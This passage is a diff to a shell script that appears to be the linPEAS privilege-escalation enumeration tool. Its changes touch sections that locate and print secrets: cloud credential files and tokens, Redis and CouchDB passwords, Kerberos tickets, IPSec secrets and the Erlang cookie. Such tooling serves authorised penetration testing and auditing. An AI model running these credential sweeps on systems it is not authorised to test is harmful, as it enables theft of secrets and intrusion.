"s,exports$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,insecure,${SED_RED},g" | sed -${E} "s,no_root_squash|no_all_squash,${SED_RED_YELLOW},g"; done; echo ""; fi @@ -2792,7 +3484,7 @@ kadmin_exists="$(command -v kadmin)" klist_exists="$(command -v klist)" if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then print_2title "Searching kerberos conf files and tickets" - print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory" + print_info "http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory" if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi @@ -2843,20 +3535,20 @@ fi if [ "$PSTORAGE_KNOCKD" ] || [ "$DEBUG" ]; then print_2title "Analyzing Knockd Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*knockd*"; fi; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do ls -ld "$f" | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*knockd*"; fi; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; fi if [ "$PSTORAGE_KIBANA" ] || [ "$DEBUG" ]; then print_2title "Analyzing Kibana Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_KIBANA\" | grep -E \"kibana\.y.*ml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kibana.y*ml"; fi; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KIBANA\" | grep -E \"kibana\.y.*ml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kibana.y*ml"; fi; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_ELASTICSEARCH" ] || [ "$DEBUG" ]; then print_2title "Analyzing Elasticsearch Files (limit 70)" echo "The version is $(curl -X GET '127.0.0.1:9200' 2>/dev/null | grep number | cut -d ':' -f 2)" - if ! [ "`echo \"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "elasticsearch.y*ml"; fi; fi; printf "%s" "$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts" | grep -Ev "\W+\#|^#"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "elasticsearch.y*ml"; fi; fi; printf "%s" "$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts" | grep -Ev "\W+\#|^#"; done; echo ""; fi @@ -2895,9 +3587,9 @@ if [ "$adhashes" ] || [ "$DEBUG" ]; then fi #-- SI) Screen sessions -if [ "$screensess" ] || [ "$screensess2" ] || [ "$DEBUG" ]; then +if ([ "$screensess" ] || [ "$screensess2" ] || [ "$DEBUG" ]) && ! [ "$SEARCH_IN_FOLDER" ]; then print_2title "Searching screen sessions" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions" screensess=$(screen -ls 2>/dev/null) screensess2=$(find /run/screen -type d -path "/run/screen/S-*" 2>/dev/null) @@ -2914,9 +3606,9 @@ fi tmuxdefsess=$(tmux ls 2>/dev/null) tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) tmuxsess2=$(find /tmp -type d -path "/tmp/tmux-*" 2>/dev/null) -if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ] || [ "$tmuxsess2" ] || [ "$DEBUG" ]; then +if ([ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ] || [ "$tmuxsess2" ] || [ "$DEBUG" ]) && ! [ "$SEARCH_IN_FOLDER" ]; then print_2title "Searching tmux sessions"$N - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions" tmux -V printf "$tmuxdefsess\n$tmuxnondefsess\n$tmuxsess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," @@ -2928,13 +3620,13 @@ fi if [ "$PSTORAGE_COUCHDB" ] || [ "$DEBUG" ]; then print_2title "Analyzing CouchDB Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_COUCHDB\" | grep -E \"couchdb$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "couchdb"; fi; fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do ls -ld "$f" | sed -${E} "s,couchdb$,${SED_RED},"; find "$f" -name "local.ini" | while read ff; do ls -ld "$ff" | sed -${E} "s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_COUCHDB\" | grep -E \"couchdb$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "couchdb"; fi; fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,couchdb$,${SED_RED},"; find "$f" -name "local.ini" | while read ff; do ls -ld "$ff" | sed -${E} "s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g"; done; echo "";done; echo ""; fi if [ "$PSTORAGE_REDIS" ] || [ "$DEBUG" ]; then print_2title "Analyzing Redis Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "redis.conf"; fi; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "redis.conf"; fi; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo ""; fi @@ -2958,89 +3650,94 @@ fi if [ "$PSTORAGE_MOSQUITTO" ] || [ "$DEBUG" ]; then print_2title "Analyzing Mosquitto Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mosquitto.conf"; fi; fi; printf "%s" "$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mosquitto.conf"; fi; fi; printf "%s" "$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_NEO4J" ] || [ "$DEBUG" ]; then print_2title "Analyzing Neo4j Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_NEO4J\" | grep -E \"neo4j$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "neo4j"; fi; fi; printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do ls -ld "$f" | sed -${E} "s,neo4j$,${SED_RED},"; find "$f" -name "auth" | while read ff; do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_NEO4J\" | grep -E \"neo4j$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "neo4j"; fi; fi; printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,neo4j$,${SED_RED},"; find "$f" -name "auth" | while read ff; do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; fi +AWSVAULT="$(command -v aws-vault 2>/dev/null)" +if [ "$AWSVAULT" ] || [ "$DEBUG" ]; then + print_2title "Check aws-vault" + aws-vault list +fi + if [ "$PSTORAGE_CLOUD_CREDENTIALS" ] || [ "$DEBUG" ]; then print_2title "Analyzing Cloud Credentials Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "legacy_credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access_tokens.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,access_tokens\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access_tokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,access_tokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"accessTokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "accessTokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "accessTokens\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,accessTokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"azureProfile\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "azureProfile.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "azureProfile\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,azureProfile\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "TokenCache.dat"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"AzureRMContext\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "AzureRMContext.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "AzureRMContext\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,AzureRMContext\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".bluemix"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bluemix$,${SED_RED},"; find "$f" -name "config.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "legacy_credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access_tokens.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,access_tokens\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access_tokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,access_tokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"accessTokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "accessTokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "accessTokens\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,accessTokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"azureProfile\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "azureProfile.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "azureProfile\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,azureProfile\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "TokenCache.dat"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"AzureRMContext\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "AzureRMContext.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "AzureRMContext\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,AzureRMContext\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".bluemix"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.bluemix$,${SED_RED},"; find "$f" -name "config.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; fi if [ "$PSTORAGE_CLOUD_INIT" ] || [ "$DEBUG" ]; then print_2title "Analyzing Cloud Init Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cloud.cfg"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" | grep -E "cloud\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cloud.cfg"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" | grep -E "cloud\.cfg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_CLOUDFLARE" ] || [ "$DEBUG" ]; then print_2title "Analyzing CloudFlare Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".cloudflared"; fi; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do ls -ld "$f" | sed -${E} "s,\.cloudflared$,${SED_RED},"; ls -lRA "$f";done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".cloudflared"; fi; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.cloudflared$,${SED_RED},"; ls -lRA "$f";done; echo ""; fi if [ "$PSTORAGE_ERLANG" ] || [ "$DEBUG" ]; then print_2title "Analyzing Erlang Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".erlang.cookie"; fi; fi; printf "%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do ls -ld "$f" | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".erlang.cookie"; fi; fi; printf "%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_GMV_AUTH" ] || [ "$DEBUG" ]; then print_2title "Analyzing GMV Auth Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_GMV_AUTH\" | grep -E \"gvm-tools\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "gvm-tools.conf"; fi; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E "gvm-tools\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|password.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GMV_AUTH\" | grep -E \"gvm-tools\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "gvm-tools.conf"; fi; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E "gvm-tools\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|password.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_IPSEC" ] || [ "$DEBUG" ]; then print_2title "Analyzing IPSec Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipsec.secrets"; fi; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipsec.conf"; fi; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipsec.secrets"; fi; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipsec.conf"; fi; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_IRSSI" ] || [ "$DEBUG" ]; then print_2title "Analyzing IRSSI Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_IRSSI\" | grep -E \"\.irssi$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".irssi"; fi; fi; printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do ls -ld "$f" | sed -${E} "s,\.irssi$,${SED_RED},"; find "$f" -name "config" | while read ff; do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_IRSSI\" | grep -E \"\.irssi$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".irssi"; fi; fi; printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.irssi$,${SED_RED},"; find "$f" -name "config" | while read ff; do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";done; echo ""; fi if [ "$PSTORAGE_KEYRING" ] || [ "$DEBUG" ]; then print_2title "Analyzing Keyring Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "keyrings"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "keyrings$" | while read f; do ls -ld "$f" | sed -${E} "s,keyrings$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keyring$\"`" ]; then if [ 